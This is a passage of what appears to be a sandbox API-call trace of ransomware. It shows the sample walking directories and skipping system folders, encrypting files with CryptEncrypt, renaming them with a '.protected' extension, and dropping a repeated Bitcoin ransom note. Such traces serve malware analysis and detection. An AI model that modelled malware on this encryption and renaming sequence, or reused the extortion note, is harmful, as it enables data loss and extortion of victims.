!\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0086.291] WriteFile (in: hFile=0x15c, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ddf4*=0x53d, lpOverlapped=0x0) returned 1 [0086.292] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0086.292] WriteFile (in: hFile=0x15c, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ddf4*=0x2ac, lpOverlapped=0x0) returned 1 [0086.292] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0086.292] WriteFile (in: hFile=0x15c, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ddf4*=0xb1, lpOverlapped=0x0) returned 1 [0086.292] CloseHandle (hObject=0x15c) returned 1 [0086.292] FindNextFileW (in: hFindFile=0x47bb50, lpFindFileData=0x295e080 | out: lpFindFileData=0x295e080) returned 0 [0086.292] FindClose (in: hFindFile=0x47bb50 | out: hFindFile=0x47bb50) returned 1 [0086.292] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\C\\RESTORE_FILES.txt") returned 115 [0086.292] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\C\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\c\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0086.293] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0086.293] WriteFile (in: hFile=0x158, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e064, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e064*=0x53d, lpOverlapped=0x0) returned 1 [0086.294] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0086.294] WriteFile (in: hFile=0x158, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e064, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e064*=0x2ac, lpOverlapped=0x0) returned 1 [0086.294] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0086.294] WriteFile (in: hFile=0x158, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e064, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e064*=0xb1, lpOverlapped=0x0) returned 1 [0086.294] CloseHandle (hObject=0x158) returned 1 [0086.295] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 1 [0086.295] lstrcmpiW (lpString1="D", lpString2="Windows") returned -1 [0086.295] lstrcmpiW (lpString1="D", lpString2="Program Files") returned -1 [0086.295] lstrcmpiW (lpString1="D", lpString2="Program Files (x86)") returned -1 [0086.295] lstrcmpiW (lpString1="D", lpString2="$Recycle.bin") returned 1 [0086.295] lstrcmpiW (lpString1="D", lpString2="System Volume Information") returned -1 [0086.295] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\D") returned 97 [0086.295] lstrcmpW (lpString1="D", lpString2=".") returned 1 [0086.295] lstrcmpW (lpString1="D", lpString2="..") returned 1 [0086.295] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\D\\*") returned 99 [0086.295] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\D\\*", lpFindFileData=0x295e080 | out: lpFindFileData=0x295e080) returned 0x47bb50 [0086.296] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0086.296] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0086.296] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0086.296] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0086.296] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0086.296] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\D\\.") returned 99 [0086.296] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0086.296] FindNextFileW (in: hFindFile=0x47bb50, lpFindFileData=0x295e080 | out: lpFindFileData=0x295e080) returned 1 [0086.296] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0086.296] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0086.296] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0086.296] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0086.296] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0086.296] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\D\\..") returned 100 [0086.297] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0086.297] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0086.297] FindNextFileW (in: hFindFile=0x47bb50, lpFindFileData=0x295e080 | out: lpFindFileData=0x295e080) returned 1 [0086.297] lstrcmpiW (lpString1="08", lpString2="Windows") returned -1 [0086.297] lstrcmpiW (lpString1="08", lpString2="Program Files") returned -1 [0086.297] lstrcmpiW (lpString1="08", lpString2="Program Files (x86)") returned -1 [0086.297] lstrcmpiW (lpString1="08", lpString2="$Recycle.bin") returned 1 [0086.297] lstrcmpiW (lpString1="08", lpString2="System Volume Information") returned -1 [0086.297] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\D\\08") returned 100 [0086.297] lstrcmpW (lpString1="08", lpString2=".") returned 1 [0086.297] lstrcmpW (lpString1="08", lpString2="..") returned 1 [0086.297] wnsprintfW (in: pszDest=0xce0048, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\D\\08\\*") returned 102 [0086.297] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\D\\08\\*", lpFindFileData=0x295de10 | out: lpFindFileData=0x295de10) returned 0x47bb90 [0086.298] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0086.298] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0086.298] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0086.298] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0086.298] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0086.298] wnsprintfW (in: pszDest=0xce0048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\D\\08\\.") returned 102 [0086.298] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0086.298] FindNextFileW (in: hFindFile=0x47bb90, lpFindFileData=0x295de10 | out: lpFindFileData=0x295de10) returned 1 [0086.298] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0086.298] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0086.298] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0086.298] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0086.298] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0086.298] wnsprintfW (in: pszDest=0xce0048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\D\\08\\..") returned 103 [0086.298] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0086.298] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0086.298] FindNextFileW (in: hFindFile=0x47bb90, lpFindFileData=0x295de10 | out: lpFindFileData=0x295de10) returned 1 [0086.298] lstrcmpiW (lpString1="71469d01", lpString2="Windows") returned -1 [0086.298] lstrcmpiW (lpString1="71469d01", lpString2="Program Files") returned -1 [0086.298] lstrcmpiW (lpString1="71469d01", lpString2="Program Files (x86)") returned -1 [0086.299] lstrcmpiW (lpString1="71469d01", lpString2="$Recycle.bin") returned 1 [0086.299] lstrcmpiW (lpString1="71469d01", lpString2="System Volume Information") returned -1 [0086.299] wnsprintfW (in: pszDest=0xce0048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\D\\08\\71469d01") returned 109 [0086.299] StrStrIW (lpFirst="71469d01", lpSrch=".protected") returned 0x0 [0086.299] lstrcmpW (lpString1="71469d01", lpString2="RESTORE_FILES.txt") returned -1 [0086.299] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ddac | out: pbBuffer=0x295ddac) returned 1 [0086.299] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ddd4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ddd4*=0x30) returned 1 [0086.299] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\D\\08\\71469d01" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\d\\08\\71469d01"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x160 [0086.299] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\D\\08\\71469d01") returned 109 [0086.299] StrStrW (lpFirst="71469d01", lpSrch=".txt") returned 0x0 [0086.299] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\D\\08\\71469d01") returned 109 [0086.299] StrStrW (lpFirst="71469d01", lpSrch=".rar") returned 0x0 [0086.299] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\D\\08\\71469d01") returned 109 [0086.299] StrStrW (lpFirst="71469d01", lpSrch=".zip") returned 0x0 [0086.300] ReadFile (in: hFile=0x160, lpBuffer=0xcf0090, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0xcf0090*, lpNumberOfBytesRead=0x295ddf4*=0x2800, lpOverlapped=0x0) returned 1 [0086.309] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0086.309] WriteFile (in: hFile=0x160, lpBuffer=0xcf0090*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0xcf0090*, lpNumberOfBytesWritten=0x295ddf4*=0x2800, lpOverlapped=0x0) returned 1 [0086.310] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0086.310] WriteFile (in: hFile=0x160, lpBuffer=0x295ddcc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x295ddcc*, lpNumberOfBytesWritten=0x295ddf4*=0x4, lpOverlapped=0x0) returned 1 [0086.310] WriteFile (in: hFile=0x160, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ddf4*=0x30, lpOverlapped=0x0) returned 1 [0086.310] CloseHandle (hObject=0x160) returned 1 [0086.310] wnsprintfW (in: pszDest=0xcf0090, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\D\\08\\71469d01.protected") returned 119 [0086.310] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\D\\08\\71469d01" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\d\\08\\71469d01"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\D\\08\\71469d01.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\d\\08\\71469d01.protected")) returned 1 [0086.311] FindNextFileW (in: hFindFile=0x47bb90, lpFindFileData=0x295de10 | out: lpFindFileData=0x295de10) returned 0 [0086.311] FindClose (in: hFindFile=0x47bb90 | out: hFindFile=0x47bb90) returned 1 [0086.311] wnsprintfW (in: pszDest=0xce0048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\D\\08\\RESTORE_FILES.txt") returned 118 [0086.311] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\D\\08\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\d\\08\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c [0086.312] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0086.312] WriteFile (in: hFile=0x15c, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ddf4*=0x53d, lpOverlapped=0x0) returned 1 [0086.312] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0086.312] WriteFile (in: hFile=0x15c, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ddf4*=0x2ac, lpOverlapped=0x0) returned 1 [0086.312] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0086.312] WriteFile (in: hFile=0x15c, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ddf4*=0xb1, lpOverlapped=0x0) returned 1 [0086.313] CloseHandle (hObject=0x15c) returned 1 [0086.313] FindNextFileW (in: hFindFile=0x47bb50, lpFindFileData=0x295e080 | out: lpFindFileData=0x295e080) returned 0 [0086.313] FindClose (in: hFindFile=0x47bb50 | out: hFindFile=0x47bb50) returned 1 [0086.313] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\D\\RESTORE_FILES.txt") returned 115 [0086.313] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\D\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\d\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0086.313] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0086.313] WriteFile (in: hFile=0x158, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e064, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e064*=0x53d, lpOverlapped=0x0) returned 1 [0086.314] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0086.314] WriteFile (in: hFile=0x158, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e064, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e064*=0x2ac, lpOverlapped=0x0) returned 1 [0086.314] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0086.314] WriteFile (in: hFile=0x158, lpBuffer=0xf018d0*, 